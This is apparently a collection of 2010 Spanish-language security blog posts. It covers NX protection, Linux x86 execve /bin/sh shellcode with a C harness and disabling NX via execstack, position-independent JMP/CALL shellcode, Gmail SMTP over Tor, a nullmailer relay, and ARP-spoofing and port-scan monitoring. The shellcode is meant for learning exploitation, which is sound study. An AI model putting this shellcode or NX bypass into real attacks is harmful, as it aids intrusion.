http://seclists.org/fulldisclosure/2010/Nov/23
http://jsunpack.jeek.org/dec/go?report=b792fac9b11b08e874a5d274741d201aeeef9016 <- pdf original
http://jsunpack.jeek.org/dec/go?report=cd93a124369bfdc7260178c55028b140cb59cc0f <- Descomprimido con pdftk

Mola de jsunpack que puedes buscar por hash MD5 del archivo y te permite bajarte lo que "ve".

shellcoding. A vueltas con el flag NX

2010-10-27T06:12:00.015+02:00

NX es una proteccion contra la explotacion de vulnerabilidades, tipicamente buffer overflows, heap overflows y demas hierbas, cuya defensa se basa en impedir que se ejecute codigo en regiones no ejecutables de la memoria. A saber: la pila, el heap y la seccion data.

Veamos si tenemos NX habilitado de forma global en Ubuntu o no. Podemos comprobarlo mirando en el archivo /proc/cpuinfo. Segun documentacion oficial en la primera linea de flags aparecera nx si la BIOS no esta deshabilitando NX (siempre que la CPU lo soporte). Casi todas las CPUs x64 soportan NX. Y las de 32 bits, si usan PAE seguramente soporten NX.

vlan7@vlan7-ubuntu:~$ grep ^flags /proc/cpuinfo |head -n1 |grep nx
flags      : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm 3dnowext 3dnow constant_tsc up rep_good nonstop_tsc extd_apicid pni monitor cx16 popcnt lahf_lm svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt
vlan7@vlan7-ubuntu:~$

Por ahi aparece el flag NX, lo que indica que en mi Ubuntu Lucid estoy usando NX.

Tambien comentar que a partir de Ubuntu 10.04 podemos ver si la BIOS esta deshabilitando NX o no mediante el siguiente comando:

vlan7@vlan7-ubuntu:~$ /usr/bin/check-bios-nx --verbose
This CPU has nx in the flags, so the BIOS is not disabling it.
vlan7@vlan7-ubuntu:~$

Podemos desactivar el flag NX pasandole el parametro -s a la herramienta execstack, que se encuentra en los repositorios de debian/ubuntu dentro del paquete prelink.

sudo aptitude install prelink

Si no queremos instalar el paquete, podemos hacerlo con ld.

-z noexecstack Mark executable as not requiring executable stack

Y... ¿como deshabilitar NX globalmente en Ubuntu?

1. Desde la BIOS (la opcion depende del modelo claro).

2. Recompilando el kernel.

Profundicemos en el punto 2. Segun documentacion oficial, Ubuntu viene compilado por defecto con la opcion -fstack-protector desde su version 6.10. Se deshabilita con -fno-stack-protector o -nostdlib en CPPFLAGS. No he podido llevarlo a cabo, y ya no dispongo de ninguna Ubuntu para probarlo :/

Vamos a por un shellcode.

vlan7@vlan7-ubuntu:~$ nasm -f elf32 sc.asm
vlan7@vlan7-ubuntu:~$ objdump -d sc.o
sc.o:     file format elf32-i386
Disassembly of section .text:
00000000 _start:
0:   eb 14                   jmp    16
00000002 :
2:   5b                      pop    %ebx
3:   31 c0                   xor    %eax,%eax
5:   99                      cltd
6:   88 43 07                mov    %al,0x7(%ebx)
9:   89 5b 08                mov    %ebx,0x8(%ebx)
c:   88 43 0c                mov    %al,0xc(%ebx)
f:   8d 4b 08                lea    0x8(%ebx),%ecx
12:   b0 0b                   mov    $0xb,%al
14:   cd 80                   int    $0x80
00000016 :
16:   e8 e7 ff ff ff          call   2
1b:   2f                      das
1c:   62 69 6e                bound  %ebp,0x6e(%ecx)
1f:   2f                      das
20:   73 68                   jae    8a

Vamos ahora a obtener los opcodes que formaran el array:

vlan7@vlan7-ubuntu:~$ objdump -d ./sc.o |grep '[0-9a-f]:' |grep -v 'file' |cut -f2 -d: |cut -f1-6 -d' ' |tr -s ' ' |tr '\t' ' ' |sed 's/ $//g' |sed 's/ /\\x/g' |paste -d '' -s |sed 's/^/"/' |sed 's/$/"/g'"\xeb\x14\x5b\x31\xc0\x99\x88\x43\x07\x89\x5b\x08\x88\x43\x0c\x8d\x4b\x08\xb0\x0b\xcd\x80\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

Entonces el sellcode queda finalmente asi:

vlan7@vlan7-ubuntu:~$ cat sc7.c
char sc[] = {"\xeb\x14\x5b\x31\xc0\x99\x88\x43\x07\x89\x5b\x08\x88\x43\x0c\x8d\x4b\x08\xb0\x0b\xcd\x80\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"};
typedef void (*f)();
int main()
{
  f func;
  func = (f)sc;
  func();
  return 0;
}

Si probamos a compilar y ejecutar la shellcode con NX activo obtendremos un segmentation fault:

vlan7@vlan7-ubuntu:~$ gcc -o sc7 sc7.c
vlan7@vlan7-ubuntu:~$ ./sc7
Fallo de segmentación

Pero si desactivamos NX:

vlan7@vlan7-ubuntu:~$ execstack -s sc7
vlan7@vlan7-ubuntu:~$ ./sc7
$

Ahi tenemos la shell :)

Referencias

Segmentation fault en un codigo ensamblador http://www.wadalbertia.org/foro/viewtopic.php?f=6&t=6048
http://www.tenouk.com/Module000linuxgas2.html
https://wiki.ubuntu.com/Security/CPUFeatures
https://wiki.ubuntu.com/CompilerFlags

Creando shellcodes "position independent"

2010-10-27T05:56:00.019+02:00

Hay un concepto en ASM/shellcoding llamado "position independent".

Por definición, un código es position-independent cuando todas las direcciones de memoria que referencia son relativas (por lo general, con respecto al registro EIP).

Para ilustrarlo, a continuacion muestro un ejemplo de un shellcode _mal hecho_ por este motivo:

BITS 32
;int execve(const char *filename, char *const argv[], char *const envp[]);

xor eax, eax
cdq ;edx=envp
push edx ;terminamos cadena de filename y el array argv
push sh ; ***!!!MAL!!!*** Se hace un push de la direccion absoluta de la cadena
mov ebx, [esp] ;ebx=direccion de la cadena
mov ecx, esp ;ecx=direccion del puntero a la cadena
mov al, 11 ;execve es la syscall 11
int 0x80
sh db "/bin/sh"

Mediante gdb, podemos ver como se hace un push a una direccion de memoria absoluta, lo que demuestra por definición que el código no es position-independent.

(gdb) disassemble _start
Dump of assembler code for function _start:
0x08048060 <_start+0>: xor %eax,%eax
0x08048062 <_start+2>: cltd
0x08048063 <_start+3>: push %edx
0x08048064 <_start+4>: push $0x8048072
0x08048069 <_start+9>: mov (%esp),%ebx
0x0804806c <_start+12>: mov %esp,%ecx
0x0804806e <_start+14>: mov $0xb,%al
0x08048070 <_start+16>: int $0x80
End of assembler dump.
(gdb) x/7b 0x08048072
0x8048072 <sh>: 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68</sh>

El shellcode devuelve una shell porque dentro de la seccion de tabla de simbolos del ELF se guarda la direccion tal y como esta referenciada por el push. Pero en una explotacion real, ya no sería así, dado que esa direccion ya no va a apuntar a /bin/sh, porque como atacante estamos bajo ambito del programa que queremos explotar, y no podemos contar con que el programa vulnerable haya colocado la cadena en la misma dirección que asumió NASM al ensamblar.

Para verlo en la práctica, basta declarar otro string que sea la cadena vlan7 en el codigo para que se vea como con 0x8048072 ya no estariamos apuntando a '/bin/sh' , sino a 'vlan7' , con lo cual lo mas probable es que se produjera una violacion de segmento.

root@bt:~# readelf -s sc |grep 08048072
root@bt:~# readelf -s sc2 |grep 08048072
4: 08048072 0 NOTYPE LOCAL DEFAULT 1 vlan7

Es decir, este shellcode no es "position independent", y lo solucionamos con una shellcode JMP/CALL que sea "position independent", es decir, que sea capaz de obtener la dirección de la cadena "/bin/sh" independientemente de donde estemos cargados en memoria. Ahi va una.

BITS 32
; int execve(const char *filename, char *const argv[], char *const envp[]);
xor eax, eax
cdq ;envp es 0
mov al, 11 ;execve es la syscall 11
push edx ;terminamos cadena y array argv
jmp short down ;jmp short = no bytes nulos
back:
mov ebx, [esp] ;direccion de la cadena
mov ecx, esp ;direccion del puntero a la cadena
int 0x80
down:
call back ;ponemos la cadena /bin/sh en la pila
db "/bin/sh"

Para terminar, algo basico pero que conviene tener presente:

mov ebx, [esp] pone en ebx la direccion de esp como todos sabemos. Pero ¿cual es la direccion de esp en ese momento?

¿Que hay antes de ese mov ebx, [esp] ?

Un call.

call tiene una "feature", y es que guarda en la pila la direccion de la siguiente instruccion, de tal forma que cuando la subrutina a la que llama finalice con un RET se pueda retornar correctamente a la siguiente instruccion (ret hace un pop de dicha direccion de memoria). Hemos colocado la cadena justo despues de la llamada a call, es por eso que su direccion se coloca en la pila.

Referencias:

Las preguntas más básicas del Shellcoding

Exploitation: Shellcodes en Linux II

Segmentation fault en un codigo ensamblador http://www.wadalbertia.org/foro/viewtopic.php?f=6&t=6048

x86 Assembly Language Reference Manual http://docs.sun.com/app/docs/doc/802-1948/6i5uqa9on?a=view

Enviar un mail anonimo desde la shell usando nuestra cuenta gmail como relay

2010-10-27T01:04:00.031+02:00

Para usar el comando AUTH, el cliente (nosotros) debe enviar al servidor la siguiente cadena codificada en Base64:

\000user@host.com\000password

\000 actua como separador.

Podemos conseguirlo con la siguiente linea de perl:

vlan7@sid7:~$ perl -MMIME::Base64 -e 'print encode_base64("\000XXX.YYY\@gmail.com\000password")'
AFhYWC5ZWVlAZ21haWwuY29tAHBhc3N3b3Jk

Ahi tenemos nuestra cadena codificada en Base64. La necesitaremos mas adelante.

Diferencias entre TLS y SSL:

La principal diferencia es que en una comunicacion con un servidor SSL, la conexion SSL se establece antes incluso de que empiece la conversacion SMTP. No ocurre esto con TLS, en el cual openssl se conecta primero en texto plano, manda el comando STARTTLS, negocia el cifrado SSL y entonces es cuando realmente comienza la sesion cifrada.

En nuestro caso google usa SSL en smtp.gmail.com:465, por lo que nos comunicamos con el asi:

vlan7@sid7:~$ /usr/bin/openssl s_client -crlf -connect smtp.gmail.com:465
CONNECTED(00000003)
depth=1 /C=US/O=Google Inc/CN=Google Internet Authority
verify error:num=20:unable to get local issuer certificate
verify return:0
---
Certificate chain
0 s:/C=US/ST=California/L=Mountain View/O=Google Inc/CN=smtp.gmail.com
i:/C=US/O=Google Inc/CN=Google Internet Authority
1 s:/C=US/O=Google Inc/CN=Google Internet Authority
i:/C=US/O=Equifax/OU=Equifax Secure Certificate Authority
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIDWzCCAsSgAwIBAgIKFMs0nQADAAASjjANBgkqhkiG9w0BAQUFADBGMQswCQYD
VQQGEwJVUzETMBEGA1UEChMKR29vZ2xlIEluYzEiMCAGA1UEAxMZR29vZ2xlIElu
dGVybmV0IEF1dGhvcml0eTAeFw0xMDA0MjIyMDAyNDVaFw0xMTA0MjIyMDEyNDVa
MGgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1N
b3VudGFpbiBWaWV3MRMwEQYDVQQKEwpHb29nbGUgSW5jMRcwFQYDVQQDEw5zbXRw
LmdtYWlsLmNvbTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAz4B46NG2l4Bk
DdccddAuuOssQ4ZxCHoyj+ErdlEqZurVCoGQzAkhZTkzHrmIgYmM6roTbkF/zEaa
2ROe9s4VoL4OgUnoyB0u1KbwrG5PHBbsMdk0r6jMmhh+MORFVYgQrFxJnu8GnHiG
W4QhmKVytu0FclYE+F1gOOx5qIgTVCMCAwEAAaOCASwwggEoMB0GA1UdDgQWBBS1+KKmwdxtkpKkJgvwhZztqe0uszAfBgNVHSMEGDAWgBS/wDDr9UMRPme6npH7/Gra
42sSJDBbBgNVHR8EVDBSMFCgTqBMhkpodHRwOi8vd3d3LmdzdGF0aWMuY29tL0dv
b2dsZUludGVybmV0QXV0aG9yaXR5L0dvb2dsZUludGVybmV0QXV0aG9yaXR5LmNy
bDBmBggrBgEFBQcBAQRaMFgwVgYIKwYBBQUHMAKGSmh0dHA6Ly93d3cuZ3N0YXRp
Yy5jb20vR29vZ2xlSW50ZXJuZXRBdXRob3JpdHkvR29vZ2xlSW50ZXJuZXRBdXRo
b3JpdHkuY3J0MCEGCSsGAQQBgjcUAgQUHhIAVwBlAGIAUwBlAHIAdgBlAHIwDQYJ
KoZIhvcNAQEFBQADgYEAUc39Y22ucA2N4mmDdPMC8DKbrRGlGMpC294mfh3yCkJa
YRWjodFQSgCtFyKhTZ9roFpSEL0D4QxAtLSwtC0bSaSVusfAW3/CFgG/Cya724ic
9UoEosoG8CK+eGoGQuEsZ0xR86J5jOs2H+4QPHFCn594V7ZySzdeQi93YV31RBE=
-----END CERTIFICATE-----
subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=smtp.gmail.com
issuer=/C=US/O=Google Inc/CN=Google Internet Authority
---
No client certificate CA names sent
---
SSL handshake has read 1711 bytes and written 303 bytes
---
New, TLSv1/SSLv3, Cipher is RC4-MD5
Server public key is 1024 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
Protocol  : TLSv1
Cipher    : RC4-MD5
Session-ID: 6B1A39E3D377B24D4A123D2E5AE320A9E21DC976131C5FEB8E7318E74CA5E573
Session-ID-ctx:
Master-Key: FF0082173AEA36C9CB330B63DC9503F7D0031FD60203056C926A98B08B1DBAE517B8417A3958E8A5E0E9C3376D36D49F
Key-Arg   : None
Start Time: 1288131594
Timeout   : 300 (sec)
Verify return code: 20 (unable to get local issuer certificate)
---
220 mx.google.com ESMTP o43sm5440941weq.23
ehlo vlan7
250-mx.google.com at your service, [X.Y.Z.A]
250-SIZE 35651584
250-8BITMIME
250-AUTH LOGIN PLAIN XOAUTH
250 ENHANCEDSTATUSCODES

Aqui vemos como acepta el comando AUTH PLAIN. Usemos la cadena codificada en Base64 que generamos al principio del texto:

AUTH PLAIN AFhYWC5ZWVlAZ21haWwuY29tAHBhc3N3b3Jk
235 2.7.0 Accepted

Y a partir de aqui mantenemos una conversacion SMTP estandar.

mail from: <xxx.yyy@gmail.com>
250 2.1.0 OK o43sm5440941weq.23
rcpt to: <zzz@vlan7.org>
250 2.1.5 OK o43sm5440941weq.23
data
354  Go ahead o43sm5440941weq.23
From: vlan7 <xxx.yyy@gmail.com>
To: vlan7 <zzz@vlan7.org>
Subject: this is a test!
hola vlan7, como estas?
.
250 2.0.0 OK 1288131795 o43sm5440941weq.23
quit
221 2.0.0 closing connection o43sm5440941weq.23
read:errno=0
vlan7@sid7:~$

Las lineas que no comienzan con ningun digito son los comandos que enviamos al servidor, las respuestas del servidor, como es habitual comienzan con un numero que indica su codigo de respuesta.

Comprobamos desde la shell el correo no leido de gmail:

vlan7@sid7:~$ curl -u ZZZ@vlan7.org --silent "https://mail.google.com/mail/feed/atom" |perl -ne 'print "\t" if /<name>/; print "$2\n" if /<(title|name)>(.*)<\/\1>/;'
Enter host password for user 'ZZZ@vlan7.org':
Gmail - Inbox for ZZZ@vlan7.org
this is a test!
vlan7
[cut]

Como podemos observar ahi lo tenemos :)

Ricemos el rizo, enviemos ahora un mail de forma cifrada tambien, pero saliendo con una IP de TOR. Necesitamos un relay que soporte SOCKS. socat es bello, stunnel tambien pero existe una herramienta minimalista escrita en python que se lleva mejor con TOR: sslredir

¿Para que sirve sslredir? Para redireccionar conexiones no SSL hacia conexiones SSL, todo ello a traves de un proxy SOCKS, en nuestro caso: tor.

Basicamente lo que haremos sera iniciar tor, poner a sslredir a la escucha en un puerto determinado, nos conectaremos por telnet al servidor proxy SOCKS tor que tenemos en localhost, y sslredir se encargara de reenviarlo a smtp.gmail.com:465

Empecemos mostrando info acerca del certificado SSL de smtp.gmail.com

vlan7@sid7:~$ sslredir -i smtp.gmail.com:465/usr/local/bin/sslredir:26: DeprecationWarning: the sha module is deprecated; use the hashlib module instead
import socket, time, sha, sys, os, struct, select, syslog,  \
[Sat Oct 30 01:59:25 2010] Using '/usr/share/ncat/ca-bundle.crt' for certificate verification
[Sat Oct 30 01:59:26 2010] Connection to smtp.gmail.com:465 established
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
14:cb:34:9d:00:03:00:00:12:8e
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=US, O=Google Inc, CN=Google Internet Authority
Validity
Not Before: Apr 22 20:02:45 2010 GMT
Not After : Apr 22 20:12:45 2011 GMT
Subject: C=US, ST=California, L=Mountain View, O=Google Inc, CN=smtp.gmail.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:cf:80:78:e8:d1:b6:97:80:64:0d:d7:1c:75:d0:
2e:b8:eb:2c:43:86:71:08:7a:32:8f:e1:2b:76:51:
2a:66:ea:d5:0a:81:90:cc:09:21:65:39:33:1e:b9:
88:81:89:8c:ea:ba:13:6e:41:7f:cc:46:9a:d9:13:
9e:f6:ce:15:a0:be:0e:81:49:e8:c8:1d:2e:d4:a6:
f0:ac:6e:4f:1c:16:ec:31:d9:34:af:a8:cc:9a:18:
7e:30:e4:45:55:88:10:ac:5c:49:9e:ef:06:9c:78:
86:5b:84:21:98:a5:72:b6:ed:05:72:56:04:f8:5d:
60:38:ec:79:a8:88:13:54:23
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Subject Key Identifier:
B5:F8:A2:A6:C1:DC:6D:92:92:A4:26:0B:F0:85:9C:ED:A9:ED:2E:B3
X509v3 Authority Key Identifier:
keyid:BF:C0:30:EB:F5:43:11:3E:67:BA:9E:91:FB:FC:6A:DA:E3:6B:12:24
X509v3 CRL Distribution Points:
URI:http://www.gstatic.com/GoogleInternetAuthority/GoogleInternetAuthority.crl
Authority Information Access:
CA Issuers - URI:http://www.gstatic.com/GoogleInternetAuthority/GoogleInternetAuthority.crt1.3.6.1.4.1.311.20.2:
...W.e.b.S.e.r.v.e.r
Signature Algorithm: sha1WithRSAEncryption
51:cd:fd:63:6d:ae:70:0d:8d:e2:69:83:74:f3:02:f0:32:9b:
ad:11:a5:18:ca:42:db:de:26:7e:1d:f2:0a:42:5a:61:15:a3:
a1:d1:50:4a:00:ad:17:22:a1:4d:9f:6b:a0:5a:52:10:bd:03:
e1:0c:40:b4:b4:b0:b4:2d:1b:49:a4:95:ba:c7:c0:5b:7f:c2:
16:01:bf:0b:26:bb:db:88:9c:f5:4a:04:a2:ca:06:f0:22:be:
78:6a:06:42:e1:2c:67:4c:51:f3:a2:79:8c:eb:36:1f:ee:10:
3c:71:42:9f:9f:78:57:b6:72:4b:37:5e:42:2f:77:61:5d:f5:
44:11
CA Signature Verified: True
Certificate fingerprint: 1a6f488fbe5bfd92d81230f922ce8449b343bd2c
vlan7@sid7:~$

Volvamos a verificarlo pero esta vez a traves de tor y mostrando solo las dos ultimas lineas, que es lo que nos interesa.

vlan7@sid7:~$ sslredir -i -s 127.0.0.1:9050 smtp.gmail.com:465 |tail -n 2
/usr/local/bin/sslredir:26: DeprecationWarning: the sha module is deprecated; use the hashlib module instead
import socket, time, sha, sys, os, struct, select, syslog,  \
CA Signature Verified: True Certificate fingerprint: 1a6f488fbe5bfd92d81230f922ce8449b343bd2c

Parece todo correcto. Para terminar vamos a hacerlo demonio enviandolo al background. Escuchara en el puerto 7777 y reenviara el trafico que reciba por ese puerto a smtp.gmail.com:465 mediante SSL a traves del proxy SOCKS que tenemos gracias a tor.

vlan7@sid7:~$ sslredir -dnl 7777 -s 127.0.0.1:9050 -f 1a6f488fbe5bfd92d81230f922ce8449b343bd2c smtp.gmail.com:465
/usr/local/bin/sslredir:26: DeprecationWarning: the sha module is deprecated; use the hashlib module instead
import socket, time, sha, sys, os, struct, select, syslog,  \

Comprobamos que lo tenemos escuchando en el puerto 7777.

vlan7@sid7:~$ netstat -tunlp |grep :7777
(Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:7777          0.0.0.0:*
LISTEN      19618/python

OK, enviemos ahora un correo de la misma forma que vimos en la primera parte.

vlan7@sid7:~$ telnet 127.0.0.1 7777
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 mx.google.com ESMTP x65sm1999579weq.1
ehlo vlan7
250-mx.google.com at your service, [83.170.92.9]
250-SIZE 35651584
250-8BITMIME
250-AUTH LOGIN PLAIN XOAUTH
250-ENHANCEDSTATUSCODES
250 PIPELINING
AUTH PLAIN AFhYWC5ZWVlAZ21haWwuY29tAHBhc3N3b3Jk
235 2.7.0 Accepted
mail from: <XXX.YYY@gmail.com>
250 2.1.0 OK x65sm1999579weq.1
rcpt to: <ZZZ@vlan7.org>
250 2.1.5 OK x65sm1999579weq.1
data
354  Go ahead x65sm1999579weq.1
From: vlan7 <XXX.YYY@gmail.com>
To: vlan7 <ZZZ@vlan7.org>
Subject: This is a test
hola vlan7 que tal
.
250 2.0.0 OK 1288395385 x65sm1999579weq.1
quit
221 2.0.0 closing connection x65sm1999579weq.1
Connection closed by foreign host.
vlan7@sid7:~$

Destaquemos la linea siguiente, donde google se nos presenta de forma muy educada y nos llama por nuestra IP.

250-mx.google.com at your service, [83.170.92.9]

Si examinamos las cabeceras completas de nuestro correo en gmail, podremos ver que el correo se ha recibido desde dicha IP: 83.170.92.9 , que deberia ser nuestro nodo tor de salida.

[cut]
Received: from vlan7 (server51262.uk2net.com [83.170.92.9])
by mx.google.com with ESMTPS id x65sm1999579weq.1.2010.10.29.16.35.27
(version=SSLv3 cipher=OTHER);
Fri, 29 Oct 2010 16:36:24 -0700 (PDT)
Message-ID: <4ccb5a78.57edd80a.1dfc.ffff827a@mx.google.com>
Date: Fri, 29 Oct 2010 16:36:24 -0700 (PDT)
From: vlan7 <xxx.yyy@gmail.com><>xxx.yyy@gmail.com<
To: vlan7 <zzz@vlan7.org><zzz@vlan7.org>
[cut]

Hagamos una ultima comprobacion. Mostremos nuestra IP publica "torificando" a curl mediante torsocks

vlan7@sid7:~$ sudo torsocks curl ifconfig.me
83.170.92.9
vlan7@sid7:~$

Ahi esta el resultado esperado, ambas IPs coinciden :)

Suerte,

P.D. Desde aqui agradecer a Vic_Thor de Wadalbertia que me notificara que se me habia colado un hash b64 sin editar, el segundo. Grave fallo que ya ha sido subsanado. Asi que ojo con lo que publicamos por ahi!

Referencias:

Implementacion de nullmailer como MTA (relay) simple

2010-10-27T00:50:00.015+02:00

nullmailer fue diseñado para actuar como relay simple. En mi escenario no tengo mas MTAs, asi que tengo implementado xinetd a la escucha. Cuando el trigger de nullmailer se dispara, nullmailer revisa la cola de mensajes y los reenvia mediante nullmailer-send a los smarthosts definidos en /etc/nullmailer/remotes

vlan7@sid7:~$ cat /etc/xinetd.d/gmail-smtp
# default: on
# description: Gmail SMTP wrapper for clients without SSL support
# vlan7 26-10-2010
# Based on:
# Added logging capabilities && one minor fix thanks to this guide:
# http://www.linuxfocus.org/English/November2000/article175.shtml
service gmail-smtp
{
  disable         = no
# bind commented. Only 1 NIC on this box. Use only_from
#    bind            = localhost
  only_from       = localhost
  port            = 10025
  socket_type     = stream
  protocol        = tcp
  wait            = no
  user            = root
  server          = /usr/bin/gmail-smtp
  type            = unlisted
# banner breaks communication :/
#    banner          = /etc/issue
  log_on_failure += USERID
}
vlan7@sid7:~$ sudo cat /usr/bin/gmail-smtp
#!/bin/sh
/usr/bin/openssl s_client -connect smtp.gmail.com:465 -quiet 2>/dev/null
vlan7@sid7:~$ cat /etc/nullmailer/remotes
127.0.0.1 smtp --port=10025 --user=XXX.YYY@gmail.com --pass=********

Atencion! El archivo /etc/nullmailer/remotes es legible para todo el mundo! Asi que ojo :/

Comprobamos la conectividad con netcat:

vlan7@sid7:~$ nc -vv 127.0.0.1 10025
localhost [127.0.0.1] 10025 (?) open
220 mx.google.com ESMTP b30sm7257373wbb.22
HELP
214 2.0.0 http://www.google.com/search?btnI&q=RFC+2821 b30sm7257373wbb.22
QUIT
221 2.0.0 closing connection b30sm7257373wbb.22
sent 10, rcvd 168
vlan7@sid7:~$

xinetd OK. Probemos a enviarnos un mensaje, a ver si nullmailer lo manda OK desde localhost autenticandose contra la cuenta gmail definida en /etc/nullmailer/remotes y reeenviandolo a XXX@vlan7.org

root@sid7:/home/vlan7# echo 'Esto es un mensaje de test' |mailx XXX@vlan7.org

Vemos la cola de correo:

root@sid7:/home/vlan7# mailq
2010-10-26 23:55:03 330 bytes from <root@sid7.xxx.es>
to <xxx@vlan7.org>

Forzamos un flush de la cola:

root@sid7:/home/vlan7# nullmailer-send
Rescanning queue.
^C

Comprobamos que la cola ha sido procesada y el correspondiente log de syslog:

root@sid7:/home/vlan7# mailq
root@sid7:/home/vlan7# tail -f /var/log/syslog
Oct 26 23:56:09 sid7 xinetd[2208]: removing time
Oct 26 23:56:09 sid7 xinetd[2208]: removing time
Oct 26 23:56:09 sid7 xinetd[2208]: Swapping defaults
Oct 26 23:56:09 sid7 xinetd[2208]: readjusting service gmail-smtp
Oct 26 23:56:09 sid7 xinetd[2208]: Reconfigured: new=0 old=1 dropped=0 (services)
Oct 26 23:57:03 sid7 nullmailer[2087]: Rescanning queue.
Oct 26 23:57:03 sid7 nullmailer[2087]: Starting delivery: protocol: smtp host: 127.0.0.1 file: 1288130103.19982
Oct 26 23:57:05 sid7 nullmailer[20012]: smtp: Succeeded: 250 2.0.0 OK 1288130224 f31sm5425073wej.15
Oct 26 23:57:05 sid7 nullmailer[2087]: Sent file.
Oct 26 23:57:05 sid7 nullmailer[2087]: Delivery complete, 0 message(s) remain.
^C

Segun syslog se ha enviado OK. Para comprobar que lo hemos recibido entramos en nuestro correo y ahi lo tenemos. Todo OK.

Referencias:

Proteccion contra arp-spoofing

2010-10-25T21:47:00.011+02:00

Un pequeño log donde intervienen arp estaticas y su monitorizacion con arpon, una buena herramienta para la proteccion de spoofing.

root@sid7:/home/vlan7# cat /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
allow-hotplug eth0
iface eth0 inet static
address 192.168.0.104
netmask 255.255.255.0
network 192.168.0.0
broadcast 192.168.0.255
#next-hop zeroshell
gateway 192.168.0.1
pre-up /etc/network/interfaces_sec
post-up /usr/sbin/arp -f /etc/sarp.conf
# dns-* options are implemented by the resolvconf package, if installed
dns-nameservers 8.8.8.8
root@sid7:/home/vlan7# cat /etc/resolv.conf
nameserver 8.8.8.8
root@sid7:/home/vlan7# netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
192.168.0.0     0.0.0.0         255.255.255.0   U         0 0          0 eth0
0.0.0.0         192.168.0.1     0.0.0.0         UG        0 0          0 eth0
root@sid7:/home/vlan7# arp -a
? (192.168.0.1) at AA:BB:CC:DD:EE:FF [ether] PERM on eth0
root@sid7:/home/vlan7# /etc/init.d/arpon status
Checking status of anti ARP poisoning daemon: arpon running.
root@sid7:/home/vlan7# cat /etc/sarp.conf
192.168.0.1
AA:BB:CC:DD:EE:FF
root@sid7:/home/vlan7# cat /etc/arpon.sarpi
# Example of arpon.sarpi
#
192.168.0.1
AA:BB:CC:DD:EE:FF #zeroshell
root@sid7:/home/vlan7# cat /var/log/arpon/arpon.log
08:14:37 - Wait link connection on eth0...
08:14:39 - SARPI on dev(eth0) inet(192.168.0.117) hw(FF:EE:DD:CC:BB:AA)
08:14:39 - Protects these Arp Cache's entries:
08:14:39 - 1)     192.168.0.1 -> AA:BB:CC:DD:EE:FF
08:14:39 - Arp Cache restore from /etc/arpon.sarpi...
08:14:39 - Arp Cache refresh timeout: 10 minuts.
08:14:39 - Realtime Protect actived!
08:15:52 - Request << AA:BB:CC:DD:EE:FF
08:15:52 - Reply   >> Send to 192.168.0.1 -> AA:BB:CC:DD:EE:FF
[cut]
08:24:39 - Refresh these Arp Cache entries:
08:24:39 - 1) 192.168.0.1 -> AA:BB:CC:DD:EE:FF
[cut]
vlan7@sid7:~$ sudo dpkg -l |grep arpon
ii  arpon                                            2.0-2                                versatile anti ARP poisoning daemon
vlan7@sid7:~$

La rutina diaria. Ya nos han vuelto a hacer un escaneo de puertos...

2010-10-25T16:37:00.021+02:00

Examinando el correo enviado a traves de nullmailer, hey no hay necesidad de montar un Postfix solo para implementar un relay, aunque pase por inet. nullmailer se autentica, contra gmail en este caso.

Yo soy la 192.168.0.117 y soy escaneado por la 192.168.0.101, fwlogwatch nos alerta de ello y recibimos el correspondiente correo electronico.


fwlogwatch ALERT: 65 packet(s) from 192.168.0.101
Recibidos
X
Responder
de XXX.YYY@gmail.com
para ZZZ@vlan7.org
fecha 25 de octubre de 2010 15:16
asunto fwlogwatch ALERT: 65 packet(s) from 192.168.0.101
enviado por gmail.com
firmado por gmail.com
ocultar detalles 15:16 (1 hora antes)
fwlogwatch ALERT on sid7: 65 packet(s) from 192.168.0.101 to 192.168.0.117

65 paquetes enviados a nullmailer por el SW logcheck, que previamente habria recibido la alerta por fwlogwatch, una herramienta que a mi me funciona muy bien con Shorewall para examinar de un vistazo los logs importantes a nivel de seguridad.

No me gusta publicar MACs, asi que edito parte de los eventos syslog que nos llegan al correo, dejando solo una de las lineas, ya que despues las mostraremos con un log que nos explica a mas alto nivel, por asi decirlo, todos esos eventos de syslog a nivel kernel mediante el SW psad [port scan attack detector]

sid7.v7.XXX.es 2010-10-25 16:02 System Events
Recibidos
X
Responder
de XXX.YYY@gmail.com
para ZZZ@vlan7.org
fecha 25 de octubre de 2010 16:02
asunto sid7.v7.XXX.es 2010-10-25 16:02 System Events
enviado por gmail.com
firmado por gmail.com
ocultar detalles 16:02 (24 minutos antes)
This email is sent by logcheck. If you no longer wish to receive
such mail, you can either deinstall the logcheck package or modify
its configuration file (/etc/logcheck/logcheck.conf).

System Events
=-=-=-=-=-=-=
Oct 25 15:16:19 sid7 kernel: [104761.341511] Shorewall:net2fw:DROP:IN=eth0 OUT= MAC=[CUT] SRC=192.168.0.101 DST=192.168.0.117 LEN=40 TOS=0x00 PREC=0x00 TTL=127 ID=61700 PROTO=TCP SPT=63436 DPT=10 WINDOW=8190 RES=0x00 SYN URGP=0

[CUT]

Oct 25 15:16:20 sid7 fwlogwatch: ALERT: 65 attempts from 192.168.0.101
Oct 25 15:16:38 sid7 psad: src: 192.168.0.101 signature match: "POLICY HP JetDirect LCD commnication attempt" (sid: 568) tcp port: 9100
